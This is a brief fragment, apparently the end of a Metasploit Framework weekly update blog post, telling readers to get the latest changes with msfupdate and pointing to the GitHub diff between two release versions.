Auxiliary and post modules

 

Get It

 

As always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015111801...4.11.5-2015120901

Filter Blog

By date: By tag: